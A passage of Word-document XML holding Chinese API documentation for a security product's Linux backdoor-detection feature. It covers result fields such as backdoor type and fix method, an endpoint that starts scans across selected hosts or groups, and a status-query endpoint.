            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EEC347B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A626FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F322BED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>后门类型，包含：应用后门，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bootkit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13C73217" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30979B37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432A50CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496A3DFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD8B5E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24C8B5EF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD967A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6A86ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C70559" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4924D33D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查功能，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《Linux检查功能字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="548FC6DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F86572" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E58952A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375F426D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C842517" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查说明，恶意进程中为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AE28B39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACCC828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D275F08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A7567BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4519691E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查结果，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《附录1》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5756D49E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6003F60D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>instruct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130343BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4A7C87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67984332" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D55E7F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39278A1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CEA56C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="050FB46A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4688E8C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33B0BCE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc115166229"/>
      <w:bookmarkStart w:id="314" w:name="linux后门检测-开始扫描"/>
      <w:bookmarkEnd w:id="312"/>
      <w:r>
        <w:t>Linux后门检测-开始扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w14:paraId="1E4AEEE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux后门检测执行扫描任务的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB4A90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2856D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75978E54"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CF4FA3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23C16C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6642268E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12CE0F1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0626E392" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00AB029B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2F967F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25AD7EC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE5367E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73683AF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EF37A0C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B8FA4F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B7609C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6602024F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761F6F08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="734547BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9DE6D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DACAC34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24571D49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0B3D8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43DD8DED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A918B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE502C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6772F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12771FB1"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BC669E" w14:paraId="0F7A63D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F078610" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAF1FED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F68BAB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCFBC5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73AD2BD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="655565DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18315D39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D2254E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70EDF3C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5577091B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A5275A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>1、如果功能开关未打开，则会抛出异常及相关提示</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、如果上次扫描任务未执行完毕，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E379AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc115166230"/>
      <w:bookmarkStart w:id="316" w:name="linux后门检测-查询扫描"/>
      <w:bookmarkEnd w:id="314"/>
      <w:r>
        <w:t>Linux后门检测-查询扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w14:paraId="45BF6405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux后门检测当前正在执行的扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6CF7EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FE5FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CD6D8CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39480BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
